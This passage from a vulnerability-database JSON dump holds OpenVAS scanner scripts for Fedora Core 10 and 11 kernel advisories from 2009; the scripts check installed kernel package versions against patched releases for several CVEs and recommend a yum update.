"2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8649 (kernel)", "bulletinFamily": 
"scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64704", "href": "http://plugins.openvas.org/nasl.php?oid=64704", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8649.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8649 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nFix sock_sendpage null pointer dereference. CVE-2009-2692.\n\nChangeLog:\n\n* Fri Aug 14 2009 Kyle McMartin 2.6.29.6-217.2.7\n- CVE-2009-2692: Fix sock sendpage NULL ptr deref.\n* Thu Aug 13 2009 Kristian H\u00f8gsberg - 2.6.29.6-217.2.6\n- Backport 0e7ddf7e to fix bad BUG_ON() in i915 gem fence management\ncode. Adds drm-i915-gem-bad-bug-on.patch, fixes #514091.\n* Wed Aug 12 2009 John W. 
Linville 2.6.29.6-217.2.5\n- iwlwifi: fix TX queue race\n* Mon Aug 10 2009 Jarod Wilson 2.6.29.6-217.2.4\n- Add tunable pad threshold support to lirc_imon\n- Blacklist all iMON devices in usbhid driver so lirc_imon can bind\n- Add new device ID to lirc_mceusb (#512483)\n- Enable IR transceiver on the HD PVR\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.3\n- Don't optimize away NULL pointer tests where pointer is used before the test.\n(CVE-2009-1897)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.2\n- Fix mmap_min_addr security bugs (CVE-2009-1895)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.1\n- Fix eCryptfs overflow issues (CVE-2009-2406, CVE-2009-2407)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8649\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8649.\";\n\n\n\nif(description)\n{\n script_id(64704);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\", \"CVE-2009-1897\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8649 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=516949\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:30", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8649.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", 
"title": "Fedora Core 11 FEDORA-2009-8649 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064704", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064704", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8649.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8649 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nFix sock_sendpage null pointer dereference. CVE-2009-2692.\n\nChangeLog:\n\n* Fri Aug 14 2009 Kyle McMartin 2.6.29.6-217.2.7\n- CVE-2009-2692: Fix sock sendpage NULL ptr deref.\n* Thu Aug 13 2009 Kristian H\u00f8gsberg - 2.6.29.6-217.2.6\n- Backport 0e7ddf7e to fix bad BUG_ON() in i915 gem fence management\ncode. Adds drm-i915-gem-bad-bug-on.patch, fixes #514091.\n* Wed Aug 12 2009 John W. 
Linville 2.6.29.6-217.2.5\n- iwlwifi: fix TX queue race\n* Mon Aug 10 2009 Jarod Wilson 2.6.29.6-217.2.4\n- Add tunable pad threshold support to lirc_imon\n- Blacklist all iMON devices in usbhid driver so lirc_imon can bind\n- Add new device ID to lirc_mceusb (#512483)\n- Enable IR transceiver on the HD PVR\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.3\n- Don't optimize away NULL pointer tests where pointer is used before the test.\n(CVE-2009-1897)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.2\n- Fix mmap_min_addr security bugs (CVE-2009-1895)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.1\n- Fix eCryptfs overflow issues (CVE-2009-2406, CVE-2009-2407)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8649\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8649.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64704\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\", \"CVE-2009-1897\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8649 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=516949\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.7.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:57", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8264.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", 
"title": "Fedora Core 10 FEDORA-2009-8264 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2008-5079", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064551", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064551", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8264.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8264 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to linux kernel 2.6.27.29:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.26\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.27\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.28\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.29\n\nFixes security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407\n\nChangeLog:\n\n* Fri Jul 31 2009 Chuck Ebbert 2.6.27.29-170.2.78\n- The kernel package needs to override the new rpm %install behavior.\n* Thu Jul 30 2009 Chuck Ebbert 2.6.27.29-170.2.77\n- Linux 2.6.27.29\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.29-170.2.75.rc1\n- Linux 2.6.27.29-rc1 (CVE-2009-2406, CVE-2009-2407)\n- Drop linux-2.6-netdev-r8169-avoid-losing-msi-interrupts.patch, now in -stable.\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.28-170.2.74\n- Don't bounce virtio_blk requests (#510304)\n* Mon Jul 27 2009 Chuck Ebbert 2.6.27.28-170.2.73\n- Linux 2.6.27.28 (CVE-2009-1895, CVE-2009-1897)\nDropped patches, merged in stable:\nlinux-2.6-kbuild-fix-unifdef.c-usage-of-getline.patch\nlinux-2.6-netdev-r8169-fix-lg-pkt-crash.patch\nNew config item:\nCONFIG_DEFAULT_MMAP_MIN_ADDR=32768\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8264\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8264.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64551\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8264 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511171\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512861\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512885\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report 
+= res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 
{"lastseen": "2018-04-06T11:37:11", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8684.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8684 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2767", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064707", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064707", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8684.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8684 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nFix oops in clock_nanosleep syscall which allows an ordinary user to cause a\nnull ptr dereference in the kernel. CVE-2009-2767. 
Fixes BUG_ON() in the intel\ngem page fault code breaking GNOME Shell.\n\nChangeLog:\n\n* Sat Aug 15 2009 Kyle McMartin 2.6.29.6-217.2.8\n- CVE-2009-2767: Fix clock_nanosleep NULL ptr deref.\n* Fri Aug 14 2009 Kyle McMartin 2.6.29.6-217.2.7\n- CVE-2009-2692: Fix sock sendpage NULL ptr deref.\n* Thu Aug 13 2009 Kristian H\u00f8gsberg - 2.6.29.6-217.2.6\n- Backport 0e7ddf7e to fix bad BUG_ON() in i915 gem fence management\ncode. Adds drm-i915-gem-bad-bug-on.patch, fixes #514091.\n* Wed Aug 12 2009 John W. Linville 2.6.29.6-217.2.5\n- iwlwifi: fix TX queue race\n* Mon Aug 10 2009 Jarod Wilson 2.6.29.6-217.2.4\n- Add tunable pad threshold support to lirc_imon\n- Blacklist all iMON devices in usbhid driver so lirc_imon can bind\n- Add new device ID to lirc_mceusb (#512483)\n- Enable IR transceiver on the HD PVR\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8684\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8684.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64707\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 